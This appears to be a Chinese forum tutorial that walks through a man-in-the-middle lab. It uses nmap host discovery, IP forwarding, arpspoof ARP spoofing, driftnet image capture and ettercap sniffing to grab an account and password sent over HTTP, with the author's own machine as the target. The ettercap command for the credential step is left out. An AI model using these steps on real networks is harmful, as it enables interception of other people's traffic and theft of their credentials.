ettercap:最初设计为交换网上的sniffer,但是随着发展,它获得了越来越多的功能,成为一款有效的、灵活的中介攻击工具。它支持主动及被动的协议解析并包含了许多网络和主机特性(如OS指纹等)分析,总之可以简单理解为可以抓取数据包。driftnet :一款简单的图片捕获工具,可以很方便的在网络数据包中抓取图片。
1.Ettercap
ettercap:最初设计为交换网上的sniffer,但是随着发展,它获得了越来越多的功能,成为一款有效的、灵活的中介攻击工具。它支持主动及被动的协议解析并包含了许多网络和主机特性(如OS指纹等)分析,总之可以简单理解为可以抓取数据包。driftnet :一款简单的图片捕获工具,可以很方便的在网络数据包中抓取图片。
2.基础语法
-T 文本模式
-G 图形模式
-D 守护进程 -M中间人
-B双网卡之间进行欺骗
-M arp
-M icmpMAC/IP)
-M dhcpip_pool/netmask/dns) -r 读取本地文件
-w 将嗅探数据保存到本地 ettercap -Tq -i eth0 //这条命令表示监控eth0网卡的流量 driftnet -i wlan0 //捕获经过eth0的图片并显示 -i 网卡,后接网卡名 3.实验复现 一,首先扫描局域网所有的ip: 输入ifconfig获取自己的网卡和ip信息
用nmap探测局域网下的主机。 命令: nmap -sP 192.168.1.0/24 //-sP后面根据自己网络填网段
本机IP:192.168.1.106
这里我们用本机作为目标进行嗅探。
二,Arp欺骗目标主机
注意:linux中默认不开启IP转发不转发的话目标机就没网,我们去手动开启他,去修改配置文件/proc/sys/net/ipv4的ip_forward中,默认为0(不转发),我们修改成1。
输入:
echo 1 >/proc/sys/net/ipv4/ip_forward //这句意思是向这个文件写入1
设置回来:echo 0 >/proc/sys/net/ipv4/ip_forward
接着我们输入:
arpspoof -i eth0 -t 192.168.1.106 192.168.1.1 //-i后面是网卡,-t 后面填目标ip 最后的填网关
我们开启了ip转发,目标ip不会断网。
三,用driftnet捕获图形
重新打开一个终端输入:
driftnet -i eth0 //这句话的意思是捕获eth0上的数据
driftnet弹出了一个窗口,是显示捕获的图片用的,我们用当前电脑去看看图片。
我们去qq空间看了一下照片,我们现在去看看kali。
我们可以看到已经成功捕获到。
我们关掉driftnet窗口,留下arp欺骗终端我们去测试账号密码获取。
四,ettercap获取账号密码
重新打开一个终端输入:
我们找一个http(https有防劫持)的网站去注册一个号
我们去kali看看
已经成功嗅探到了我们刚刚注册的号的信息
4.实验结束
教程到此结束,有疑惑的话可以在论坛留言,或者进入QQ群讨论。
|